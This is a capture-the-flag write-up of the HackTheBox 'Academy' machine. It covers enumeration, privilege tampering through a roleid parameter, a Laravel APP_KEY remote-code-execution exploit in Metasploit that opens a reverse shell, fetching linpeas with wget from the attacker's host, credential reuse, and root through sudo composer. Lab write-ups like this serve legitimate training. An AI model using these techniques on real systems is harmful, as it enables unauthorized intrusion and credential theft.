Academy — HackTheBox — WriteUp

Hello. I’m Rahmos. Here is my Academy — HackTheBox — WriteUp. Check it out!

1/Enumeration

First add academy.htb to your /etc/hosts, then nmap to see opened ports on this machine:

nmap -A -T4 -p- -v <ip>

There are 3 ports opened: 22(SSH), 80(HTTP) and 33060(mysql).

First, let’s access the website at port 80:

I’ve checked the page source (Ctrl + U), but nothing valuable. Next, scan for hidden dirs using gobuster:

gobuster dir -u http://academy.htb -w /path-to-wordlist

Access /admin:

I need credentials to login. I haven’t known the credential yet, so just register a account and login. I will register an account called “customer”.

After login, I’ve entered the page as “egre55”.

I tried to register another account: “customer2”, and login, and I’m also in as “egre55”. Which means, the website uses cookie (PHPSESSID) for authentication. No matters what account you register, if it’s a non-admin account, it will have the same PHPSESSID. So that, there’s only one non-admin account inside the web’s database: “egre55”.

Let’s take a look again from the register, I’m gonna catch the request with Burpsuite. I will register another account, called “admin3”. Here’s the request in Burp:

Ok so the “roleid” is which I need to manipulate. In the database, it will look like this:

non-admin: roleid=0

admin: roleid=1

So I will change the “roleid” to 1 and forward the request. Then, access /admin.php and login with the account I’ve just registered:

And yes! I’m in the admin-page! Look at the last line, I’ve known another subdomain, and this subdomain has some issue. So let’s add this subdomain into your /etc/hosts, and access it. Here is the dev page:

Scroll down and look closely, I’ve seen some sensitive information:

The app name is “Laravel”. Look on Google for exploit and I’ve found a Metasploit module. Let’s go ahead and “msfconsole”!

search laravel

Use it. Type “options” to set needed field, and what you need to set is:

APP_KEY: paste the app key in the dev page above

RHOSTS: the machine’s ip

RPORT: The website’s port

LHOST: Your VPN-ip

LPORT: your listener port

VHOST: the subdomain name

After everything is set, “run

I’ve got the shell into the machine! Spawn a tty shell using python:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

export TERM=xterm

2/ User flag

Move around to view users:

Ok so there’re 7 users (include root).

The user.txt flag will be inside cry0l1t3 folder:

However, I cannot read it right now due to permission. So I have to find a way to be cry0l1t3.

Let’s try login to mysql with the credential I found:

Well look likes I don’t have the permission to mysql. Next, I’ll transfer the “linpeas” script to enum the machine.

First, start a http server on your machine:

python3 -m http.server 9000

Then from the target machine, cd /tmp and:

wget http://<your-VPN-ip>:9000/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

Read the result. Scroll down and you’ll see more sensitive information:

After a while, I’ve found another mysql credential inside /var/www/html/academy/.env: mySup3rP4s5w0rd!!

Try to login with that credential but still not working! 😐

Enum and enum again, finally I found the mysql’s credential for root inside /var/www/html/academy/public/config.php: GkEWXn4h34g8qx9fZ1

Login successful! Now it’s time to find users’ password.

Put all the hashes to crackstation to decrypt:

However, it’s only the password for web’s users, not what I’m looking for. I’m really stuck here… 😣

Take a look again, the password: mySup3rP4s5w0rd!! cannot be used to login to mysql, but let’s try to su cry0l1t3 with this password? Why not?

It works! Let’s get the 1st flag!

3/ Root flag

Now I’ll find a way to own root. First, sudo -l to check if I can sudo:

Well I can’t. So let’s find anotherway.

I’m in the “adm” group, and users inside “adm” group can view logs inside /var/log:

So again, run the linpeas.sh script to enum the log, and I’ve found this:

Looks like it’s mrb3n password! Let’s try su to him:

Ah yes! It’s the correct password!

Now let’s see if mrb3n can run sudo:

Yes, he can run composer as root. Reference to gtfobins, run these commands to own root:

Now run these commands in order:

And I’m root! Get the final flag in /root/root.txt:

The end.

Bonus:

cd /root and there’s also another message for you!

HAPPY HACKING

I’m Groot